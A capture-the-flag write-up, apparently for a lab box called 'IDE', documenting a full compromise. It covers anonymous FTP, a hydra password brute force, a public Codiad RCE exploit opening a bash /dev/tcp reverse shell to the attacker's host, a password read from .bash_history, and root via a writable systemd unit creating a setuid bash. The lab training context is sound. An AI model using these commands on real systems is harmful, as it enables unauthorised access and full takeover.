# IDE

In the following, the IP of our deployed instance is `10.10.60.5`.

## Enumeration (`nmap`)
```
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:**.*.*.***
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e2:be:d3:3c:e8:76:81:ef:47:7e:d0:43:d4:28:14:28 (RSA)
|   256 a8:82:e9:61:e4:bb:61:af:9f:3a:19:3b:64:bc:de:87 (ECDSA)
|_  256 24:46:75:a7:63:39:b6:3c:e9:f1:fc:a4:13:51:63:20 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
62337/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Codiad 2.8.4
|_http-server-header: Apache/2.4.29 (Ubuntu)
```

## FTP as `Anonymous`
```
$ lftp -u Anonymous 10.10.60.5
lftp Anonymous@10.10.60.5:/> ls -la
drwxr-xr-x    3 0        114          4096 Jun 18  2021 .
drwxr-xr-x    3 0        114          4096 Jun 18  2021 ..
drwxr-xr-x    2 0        0            4096 Jun 18  2021 ...
lftp Anonymous@10.10.60.5:/> cd ...
cd ok, cwd=/...
lftp Anonymous@10.10.60.5:/...> ls -la
-rw-r--r--    1 0        0             151 Jun 18  2021 -
drwxr-xr-x    2 0        0            4096 Jun 18  2021 .
drwxr-xr-x    3 0        114          4096 Jun 18  2021 ..
lftp Anonymous@10.10.60.5:/...> cat ./-
Hey john,
I have reset the password as you have asked. Please use the default password to login.
Also, please take care of the image file ;)
- drac.
```

## HTTP at 62337
Let us find out `john`'s _default_ password:
```
$ hydra -l john -P ~/Sec/SecLists/Passwords/500-worst-passwords.txt -s 62337 10.10.60.5 http-post-form '/components/user/controller.php?action=authenticate:username=^USER^&password=^PASS^:error'
[62337][http-post-form] host: 10.10.60.5   login: john   password: password
```
Log in. The IDE Codiad 2.8.4 we now have access to has a [known RCE exploit](https://www.exploit-db.com/exploits/49705) when authenticated. Let us use it to set up a reverse shell:
```
$ python3 49705.py http://10.10.60.5:62337/ john password **.*.*.*** 8765 linux
[+] Please execute the following command on your vps: 
echo 'bash -c "bash -i >/dev/tcp/**.*.*.***/8766 0>&1 2>&1"' | nc -lnvp 8765
nc -lnvp 8766
...
```
Listen for the reverse shell, upgrade:
```
$ nc -lnvp 8766
www-data@ide:/var/www/html/codiad/components/filemanager$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ide:/var/www/html/codiad/components/filemanager$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ide:/var/www/html/codiad/components/filemanager$ ^Z
$ stty raw -echo; fg
www-data@ide:/var/www/html/codiad/components/filemanager$ cd /home/drac
```
We cannot read the user flag, but we quickly find a candidate for `drac`'s password:
```
www-data@ide:/home/drac$ cat .bash_history
mysql -u drac -p '****REDACTED****'
```

## SSH as `drac`
Of course that DB password (though there does not seem to be any DB running) is also `drac`'s account password. We read the **user flag** and look for a way to escalate:
```
drac@ide:~$ cat user.txt
**REDACTED**
drac@ide:~$ sudo -l
...
User drac may run the following commands on ide:
    (ALL : ALL) /usr/sbin/service vsftpd restart

drac@ide:~$ find / -name '*vsftpd*' -type f -group drac 2>/dev/null
/lib/systemd/system/vsftpd.service
drac@ide:~$ ls -l /lib/systemd/system/vsftpd.service
-rw-rw-r-- 1 root drac 248 Aug  4  2021 /lib/systemd/system/vsftpd.service
drac@ide:~$ cat /lib/systemd/system/vsftpd.service 
[Unit]
Description=vsftpd FTP server
After=network.target

[Service]
Type=simple
ExecStart=/usr/sbin/vsftpd /etc/vsftpd.conf
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty

[Install]
WantedBy=multi-user.target
```

## Priv. Esc. to `root`
Edit for instance the `ExecStart` line to:
```
ExecStart=/bin/bash -c 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash'
```
Restart the service, become `root` and read the **root flag**:
```
drac@ide:/tmp$ systemctl daemon-reload
...
drac@ide:/tmp$ sudo /usr/sbin/service vsftpd restart
...
drac@ide:/tmp$ ./rootbash -p
rootbash-4.4# cat /root/root.txt 
**REDACTED**
```
